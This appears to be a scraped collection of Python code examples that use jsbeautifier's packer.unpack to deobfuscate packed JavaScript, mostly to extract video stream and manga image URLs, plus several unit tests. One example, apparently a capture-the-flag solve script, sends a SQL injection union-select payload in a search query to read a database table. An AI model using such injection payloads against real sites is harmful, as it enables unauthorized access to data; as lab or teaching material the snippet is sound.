def get_video_url(url, DEBUG=0):
    scraper = cfscrape.create_scraper()

    try:
        response = scraper.get(
            'http://www.fastvideo.me/embed-%s-607x360.html' %
            re.search('me/([^/]+)/', url).group(1))
    except:
        return False, "Url not found"

    if 'p,a,c,k,e,d' in response.content:
        try:
            packed = re.search(
                r'<script[^>]+>eval\((function\(p,a,c,k,e,d\).*\)\))\).*?<\/script>',
                response.content, re.S).group(1)
        except:
            packed = None
            return False, "Packed regex error"

        if packed:
            import jsbeautifier.unpackers.packer as packer
            jwconfig = packer.unpack(packed)

            url = re.search('file:"([^"]+)"', jwconfig).group(1)

            return True, url
    else:
        return False, "Packed not found"
Ejemplo n.º 2
0
def is_artefact_packed(filename, byte_content):
    """
   Returns a tuple (is_packed, unpacked_byte_content) if the artefact is packed using an algorithm
   similar to Dave Edward's p.a.c.k.e.r algorithm. This appears to generate syntax errors compounding feature analysis,
   but we try anyway...
   """
    # dont load the file again if we already have the byte-content...
    if byte_content is None:
        with open(filename, 'rb') as fp:
            byte_content = fp.read()

    try:
        source = fast_decode(byte_content)
        is_packed = packer.detect(source)
        if is_packed:
            ret = packer.unpack(source)
            # TODO FIXME... yuk this is so silly! But we have to return bytes since extract-features.jar program expects that...
            # fortunately most artefacts arent packed so this is not as expensive as it could be...
            result = decode(encode(ret, 'utf-8', 'backslashreplace'),
                            'unicode-escape').encode()
            assert isinstance(result, bytes)
            assert len(result) > 0
            return (True, result)
        # else
        return (False, byte_content)
    except Exception as e:
        # we fail an artefact that is purportedly packed, but which cannot be unpacked...
        raise e
Ejemplo n.º 3
0
       def _get_streams(self):
              headers = {
                     'User-Agent': useragents.CHROME,
                     'Referer': self.url
              }

              res = http.get(self.url)
              html_text = res.text
              soup = BeautifulSoup(html_text, 'html.parser')
              scripts = soup.find_all('script')
              for script in scripts:
                     if script.string is not None:
                            if "document.getElementsByTagName('video')[0].volume = 1.0;" in script.string: 
                                   code = script.string
				   startidx = code.find('eval(function(p,a,c,k,e,')
				   endidx = code.find('hunterobfuscator =')
				   code = code[startidx:endidx]
			# Here is the call to the first part of the deobfuscation i.e. getting packed code
			           #code = aadecode(code)
			           #code = code.aadecode()
			           if not code.replace(' ', '').startswith('eval(function(p,a,c,k,e,'):
				          code = 'fail'
                                   break
			    else:
				   code = 'fail'
                     else:
			    code = 'fail'
	#The second part of deobfuscation occurs here. Using module jsbeautifier.
              if code != 'fail':
                     unpacked = packer.unpack(code)
                     video_location = unpacked[unpacked.rfind('http'):unpacked.rfind('m3u8')+4]
                     url = video_location
              if url:
                     self.logger.debug('HLS URL: {0}'.format(url))
                     yield 'live', HLSStream(self.session, url, headers=headers)
Ejemplo n.º 4
0
def get_video_url(url):

    list = []
    from xbmctools import getnet, finddata
    data = getnet(url)

    regx = '''<script type="text/javascript"(.*)</script>'''
    #print "jucie",_filter(data)
    #print"data1", data
    data2 = finddata(data.replace("\n", ""), 'eval(', '</script')

    unpack = packer.unpack(data2)
    print 'unpack', unpack

    regx = '''http://(.*?)mkv'''

    try:
        link = 'http://' + re.findall(regx, unpack, re.M | re.I)[0] + 'mkv'

    except:
        regx = '''http://(.*?)mp4'''
        link = 'http://' + re.findall(regx, unpack, re.M | re.I)[0] + 'mp4'

    print 'link', link

    return link
Ejemplo n.º 5
0
def extract_ports(js_url):

    dict = {}

    # Download the JS file.
    html = download_webpage(js_url)
    if html is None:
        log.error('Failed to download webpage: %s', js_url)
        return dict

    try:
        # For now, try and extract out the css/port pairs from the JS.
        # This likely is a really back way of doing it, I'll revisit later.
        unpack = packer.unpack(html)
        unpack = unpack.replace("$(document).ready(function(){", "")
        unpack = unpack.replace("});", "")
        unpack = unpack.replace("\\", "")
        unpack = unpack.replace("'", "")
        unpack = unpack.replace(".", "")

        # Pull out everything that is within a bracket.
        parts = re.findall('\((.*?)\)', unpack)

        # Now convert the list into a dictionary.
        # Every other entry in the list is a pair css/port.
        i = 0
        while i < len(parts):
            dict[parts[i]] = parts[i + 1]
            i += 2

        return dict

    except Exception as e:
        log.exception('Failed do extract ports from %s: %s.', js_url, e)
        return dict
Ejemplo n.º 6
0
def play_video(selection):
	r = requests.get(arconaitv_url+selection)
	html_text = r.text
	soup = BeautifulSoup(html_text, 'html.parser')
	scripts = soup.find_all('script')
	for script in scripts:
		if script.string is not None:
			if "document.getElementsByTagName('video')[0].volume = 1.0;" in script.string:
				code = script.string
				startidx = code.find('eval(function(p,a,c,k,e,')
				endidx = code.find('hunterobfuscator =')
				code = code[startidx:endidx]
				# Here is the call to the first part of the deobfuscation i.e. getting packed code
				#code = aadecode(code)
				#code = code.aadecode()
				if not code.replace(' ', '').startswith('eval(function(p,a,c,k,e,'):
					code = 'fail'
				break
			else:
				code = 'fail'
		else:
			code = 'fail'
	#The second part of deobfuscation occurs here. Using module jsbeautifier. 
	if code != 'fail':
		unpacked = packer.unpack(code)
		video_location = unpacked[unpacked.rfind('http'):unpacked.rfind('m3u8')+4]
		play_item = xbmcgui.ListItem(path=video_location+'|User-Agent=%s' % urllib2.quote(USER_AGENT, safe=''))
		xbmcplugin.setResolvedUrl(addon_handle, True, listitem=play_item)
	else:
		xbmcgui.Dialog().ok('Sorry','Could not deobfuscate the code.')
Ejemplo n.º 7
0
    def parse(self, response):

        script = response.xpath('//script[1]/text()').extract()[0]
        parse_str = script.strip().split('\n')[2]
        # print(parse_str)
        pages = packer.unpack(parse_str.strip())
        # pages = packer.unpack(str(parse_str.strip()))
        pages = pages.replace("var pages=pages=\\'[",
                              "").replace(";", "").replace("\\", "").replace(
                                  '"', "").replace("[",
                                                   "").replace("]",
                                                               "").split(",")

        # for page in pages:
        item = LearningItem()
        #     item['image_urls'] = "https://images.dmzj.com/" + page

        item['image_urls'] = map(lambda x: "https://images.dmzj.com/" + x,
                                 pages)

        item['img_dirname2'] = response.xpath(
            "//span[@class='redhotl']/text()").extract()[0]
        item['img_dirname1'] = response.xpath(
            "//a[@class='redhotl']/text()").extract()[0]
        # item['image_urls'].append("https://images.dmzj.com/" + pages[0])

        # for img_link in pages:

        # item["image_urls"] = "https://images.dmzj.com/" + img_link

        yield item
Ejemplo n.º 8
0
    def test_unpack(self):
        """Test unpack() function."""
        check = lambda inp, out: self.assertEqual(unpack(inp), out)

        check("eval(function(p,a,c,k,e,r){e=String;if(!''.replace(/^/,String)"
              "){while(c--)r[c]=k[c]||c;k=[function(e){return r[e]}];e="
              "function(){return'\\\\w+'};c=1};while(c--)if(k[c])p=p.replace("
              "new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c]);return p}('0 2=1',"
              "62,3,'var||a'.split('|'),0,{}))", 'var a=1')
Ejemplo n.º 9
0
    def test_unpack(self):
        """Test unpack() function."""
        check = lambda inp, out: self.assertEqual(unpack(inp), out)

        check(
            "eval(function(p,a,c,k,e,r){e=String;if(!''.replace(/^/,String)"
            "){while(c--)r[c]=k[c]||c;k=[function(e){return r[e]}];e="
            "function(){return'\\\\w+'};c=1};while(c--)if(k[c])p=p.replace("
            "new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c]);return p}('0 2=1',"
            "62,3,'var||a'.split('|'),0,{}))", 'var a=1')
Ejemplo n.º 10
0
def fetch_images_url(chapter_url=''):
    request_url = HOME_URL_PREFIX + chapter_url
    req = requests.get(request_url, headers=HEADERS)
    tmp_url = req.text.split('\n')[11]  # html中第11行保存了图片的URL后缀
    tmp_url = unpack(tmp_url)
    pic_url_str = re.sub('var pages\s?=\s?pages\s?=\\\\\'\[\"', '', tmp_url)
    pic_url_str = re.sub('\"\]\\\\\';\s?', '', pic_url_str)

    pic_url_arr = []  # 保存最新一章的图片URL
    for i in pic_url_str.replace('\\\/', '/').split('","'):
        # url = PIC_URL_PREFIX + urllib.quote(i.decode('unicode-escape').encode('utf8'))
        url = PIC_URL_PREFIX + i
        pic_url_arr.append(url)
    return pic_url_arr
Ejemplo n.º 11
0
def fetch_images_url(chapter_url=''):
    request_url = HOME_URL_PREFIX + chapter_url
    req = requests.get(request_url, headers=HEADERS)
    tmp_url = req.text.split('\n')[11]  # html中第11行保存了图片的URL后缀
    tmp_url = unpack(tmp_url)
    pic_url_str = re.sub('var pages\s?=\s?pages\s?=\\\\\'\[\"', '', tmp_url)
    pic_url_str = re.sub('\"\]\\\\\';\s?', '', pic_url_str)

    pic_url_arr = []  # 保存最新一章的图片URL
    for i in pic_url_str.replace('\\\/', '/').split('","'):
        # url = PIC_URL_PREFIX + urllib.quote(i.decode('unicode-escape').encode('utf8'))
        url = PIC_URL_PREFIX + i
        pic_url_arr.append(url)
    return pic_url_arr
Ejemplo n.º 12
0
def solve_js(html):
    js = '(function' + re.findall('function(.*?)</script>', html)[0]
    encrpyted_js = js.split(',')[-3][1:-15]
    decrypted_js = lzstring.LZString().decompressFromBase64(encrpyted_js)
    original_js = js.split(',')
    original_js[-3] = "'" + decrypted_js + "'.split('|')"
    packed_js = 'eval(' + ','.join(original_js) + ')'
    # print('packed_js', packed_js)
    unpack = packer.unpack(packed_js)
    print(unpack)
    # js_result = jsbeautifier.beautify(unpack)
    # print('js_result', js_result)
    imgData = re.findall("SMH\.imgData\((.*?)\)\.preInit\(\)\;", unpack)[0]
    res = json.loads(imgData)
    print(res['bname'])
    return res
Ejemplo n.º 13
0
def obtem_vidig2(url):
    import jsbeautifier.unpackers.packer as packer
    soup = BeautifulSoup(abrir_url(url))
    codigo_fonte = packer.unpack(soup('script')[6].text)
    #ow = open(r'G:\\html_list\\script4.html','w')
    #ow.write(str(soup('script')[6]))
    #ow.close()#"(http://.*?/v.flv)"
    try:
	    url_video = re.findall(r"'(http://.*?/v.mp4)\\'",codigo_fonte)[0]
	    return [url_video+'|User-Agent=Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36',"-"]
    except:
	    pass
	
    try:
	    url_video = re.findall(r'"(http://.*?/v.flv)"',codigo_fonte)[0]
	    return [url_video+'|User-Agent=Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36',"-"]
    except:
	    return ["-","-"]
Ejemplo n.º 14
0
def get_video_url(url):
       
        list=[]
        from xbmctools import getnet,finddata
        data=getnet(url)
       
        regx='''<script type="text/javascript"(.*)</script>'''
        #print "jucie",_filter(data)
        #print"data1", data
        data2 =finddata(data.replace("\n",""),'eval(','</script')

       
        
        try:
                unpack = packer.unpack(data2)
        except:
                unpack=data

        
        regx='''file:"(.*?)m3u8"'''
        try:
                m3u8=re.findall(regx,unpack, re.M|re.I)[0]+'m3u8'
                list.append(('m3u8',m3u8))
        except:
                            pass

        regx=''',{file:"(.*?)mp4"'''
        try:
                mp4=re.findall(regx,unpack, re.M|re.I)[0]+'mp4'
                list.append(('mp4',mp4))
        except:
                            pass
        print "list",list                    
        return list
        Pre_Stream_URL = re.search('file:"(.*)"', unpack).group(1)
        print 'Pre_Stream_URL1',Pre_Stream_URL
        Pre_Stream_URL = re.search('file:"(.*)",label', unpack).group(1)
        
        print 'Pre_Stream_URL2',Pre_Stream_URL
        sys.exit(0)
        return Pre_Stream_URL        
Ejemplo n.º 15
0
    def fetch(self, url):
        soup = self.requester.get(url)

        test = re.search(r"eval(?:.+fullscreen.+\))", soup.text)

        if test is None:
            return

        unpack = packer.unpack(test.group())

        test = re.search("http:\/\/[^\s\"]+.\.(?:mp4|mpg|avi|flv)", unpack)

        if test is None:
            return

        info = self.requester.send(test.group())

        info = re.search(r"(['\"])(?P<url>https:.+)\1", info.text)

        if info is None:
            return

        return info.group("url")
Ejemplo n.º 16
0
    def parse_page_ext2(self, response):
        """
        拿到跟图片地址有关的js
        """
        manga_no = response.meta['manga_no']
        chapter_no = response.meta['chapter_no']
        manga_name = response.meta['manga_name']
        chapter_name = response.meta['chapter_name']
        manga_save_folder = response.meta['manga_save_folder']
        data = response.meta['data']
        current_page = response.meta['current_page']
        page_count = response.meta['page_count']
        try_repr = response.meta.setdefault('try_repr', False)
        proxy = response.meta['proxy']
        # 返回一段js代码
        # jsbeautifier 1.7.5解码
        # python3 兼容
        response_body_str = str(response.body, response.encoding)
        packed_js = response_body_str
        try:
            if try_repr == True:
                packed_js = repr(packed_js)
            unpacked_js = packer.unpack(packed_js).replace("\\'", "'")

            # 解码后找出图片路径
            cid = re.findall('var cid=(.*?);', unpacked_js)[0]
            key = re.findall("var key='(.*?)';", unpacked_js)[0]
            pix = re.findall('var pix="(.*?)";', unpacked_js)[0]
            pvalue = re.findall('var pvalue=\[(.*?)\];', unpacked_js)[0]
            pvalue = pvalue.replace('"', '')
            if (',' in pvalue):
                pvalue = pvalue.split(',')
            else:
                pvalue = [
                    pvalue,
                ]
            image_url = pix + pvalue[0] + '?cid=' + cid + '&key=' + key + '&uk='

            item = Dm5Item()
            item['imgurl'] = image_url
            item['imgname'] = image_url.split('/')[-1].split('_')[0].zfill(
                3) + '.jpg'
            # 不使用pipeline下载需要特殊处理下载地址
            item['imgfolder'] = settings.get(
                'IMAGES_STORE') + '/' + manga_save_folder + '/' + chapter_no
            # 准备下载图片
            image_save_path = os.path.join(item['imgfolder'], item['imgname'])

            # 跳过已经下载的图片
            if not os.path.exists(image_save_path):
                if not os.path.exists(item['imgfolder']):
                    os.makedirs(item['imgfolder'])
                print('当前页面', manga_name, chapter_no, chapter_name,
                      current_page, '/', page_count)
                host = image_url.split('//')[1].split('/')[0]
                headers = {
                    'Host':
                    host,
                    'User-Agent':
                    'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0',
                    'Accept':
                    '*/*',
                    'Connection':
                    'close',
                    'Accept-Language':
                    'zh-CN,zh;q=0.8,en;q=0.5,en-US;q=0.3',
                    'Accept-Encoding':
                    'gzip, deflate',
                    'Referer':
                    'http://www.dm5.com/m' + str(data['cid']) + '-p' +
                    str(current_page) + '/',
                    'DNT':
                    '1',
                }
                # print 1111, image_url

                # 使用urllib2下载图片
                # req = urllib2.Request(image_url, headers=headers)
                # res = urllib2.urlopen(req)
                # # print res
                # with open(image_save_path, 'wb') as f:
                #     f.write(res.read())

                # 使用requests下载图片
                # res = requests.get(image_url, headers=headers, proxies=proxyDict)
                # with open(image_save_path, 'wb') as f:
                #     f.write(res.content)

                # 使用自定义的imagepipeline下载图片
                item['imgheaders'] = headers
                item['imgproxy'] = proxy
                yield item

            # 准备访问下一页
            current_page += 1
            if int(current_page) > int(page_count):
                return
            data['page'] = current_page

            pages_url = 'http://www.dm5.com/m' + str(
                data['cid']) + '/chapterfun.ashx?' + urllib.parse.urlencode(
                    data)
            yield scrapy.Request(pages_url,
                                 cookies=cookies,
                                 headers={
                                     'Referer':
                                     'http://www.dm5.com/m' +
                                     str(data['cid']) + '/'
                                 },
                                 meta={
                                     'proxy': proxy,
                                     'manga_no': manga_no,
                                     'chapter_no': chapter_no,
                                     'manga_name': manga_name,
                                     'chapter_name': chapter_name,
                                     'manga_save_folder': manga_save_folder,
                                     'data': data,
                                     'current_page': current_page,
                                     'page_count': page_count
                                 },
                                 callback=self.parse_page_ext2)
        except UnpackingError as e:
            print('解包js错误 访问地址', response.url)
            print('当前页面', current_page)
            response_body_str = str(response.body, response.encoding)
            print('返回内容', response_body_str)
            if try_repr == True:
                # 准备访问下一页
                current_page += 1
                if int(current_page) > int(page_count):
                    return
                data['page'] = current_page

                pages_url = 'http://www.dm5.com/m' + str(
                    data['cid']
                ) + '/chapterfun.ashx?' + urllib.parse.urlencode(data)
                yield scrapy.Request(pages_url,
                                     cookies=cookies,
                                     headers={
                                         'Referer':
                                         'http://www.dm5.com/m' +
                                         str(data['cid']) + '/'
                                     },
                                     meta={
                                         'proxy': proxy,
                                         'manga_no': manga_no,
                                         'chapter_no': chapter_no,
                                         'manga_name': manga_name,
                                         'chapter_name': chapter_name,
                                         'manga_save_folder':
                                         manga_save_folder,
                                         'data': data,
                                         'current_page': current_page,
                                         'page_count': page_count
                                     },
                                     callback=self.parse_page_ext2)
            else:
                yield scrapy.Request(response.url,
                                     cookies=cookies,
                                     meta={
                                         'proxy': proxy,
                                         'manga_no': manga_no,
                                         'chapter_no': chapter_no,
                                         'manga_name': manga_name,
                                         'chapter_name': chapter_name,
                                         'manga_save_folder':
                                         manga_save_folder,
                                         'data': data,
                                         'current_page': current_page,
                                         'page_count': page_count,
                                         'try_repr': True
                                     },
                                     callback=self.parse_page_ext2,
                                     dont_filter=True)
Ejemplo n.º 17
0
 def check(inp, out):
     return detect(inp) and self.assertEqual(unpack(inp), out)
Ejemplo n.º 18
0
req = requests.Request(
    'GET',
    base_url +
    '/Search?query=1%27+and+1%3D0+union+select+1%2C2%2CContent%2C4%2Cnull%2Cnull+from+Reviews+where+id%3D10+--+-',
    headers=headers,
    cookies=cookies)
r = requestDebug(s, req)
img = BeautifulSoup(r.text, 'lxml').find('img', {'src': '2'}).get('alt')
first_obfuscated_part = img.split('\n', 3)[2]
second_obfuscated_part = img.split('\n', 4)[3]

#
# Reverse algorithm in second_obfuscated_part to get the "good" input
#

second_part_unpacked = packer.unpack(img.split('\n', 4)[3]).split(';', 2)[0]
flag = eval(second_part_unpacked.split()[1].split('"')[1])
myDebug('1:\n%s\n' % flag)
input = flag[::-1]
myDebug('2:\n%s\n' % input)
intermediate = ""
for i in range(len(input)):
    intermediate += chr(input[i] - 20) if i % 2 == 0 else chr(input[i])
myDebug('3:\n%s\n' % intermediate)
input = intermediate.replace('\\x', '')
myDebug('4:\n%s\n' % input)
intermediate = b''
for i in range(0, len(input), 2):
    intermediate += codecs.decode(input[i:i + 2], 'hex')
input = codecs.decode(intermediate, 'base64').decode()
myDebug('5:\n%s\n' % input)
Ejemplo n.º 19
0
 def check(inp, out):
     return self.assertEqual(unpack(inp), out)
Ejemplo n.º 20
0
 def check(inp, out):
     return detect(inp) and self.assertEqual(unpack(inp), out)
Ejemplo n.º 21
0
        def check(inp, out): return self.assertEqual(unpack(inp), out)

        check("eval(function(p,a,c,k,e,r){e=String;if(!''.replace(/^/,String)"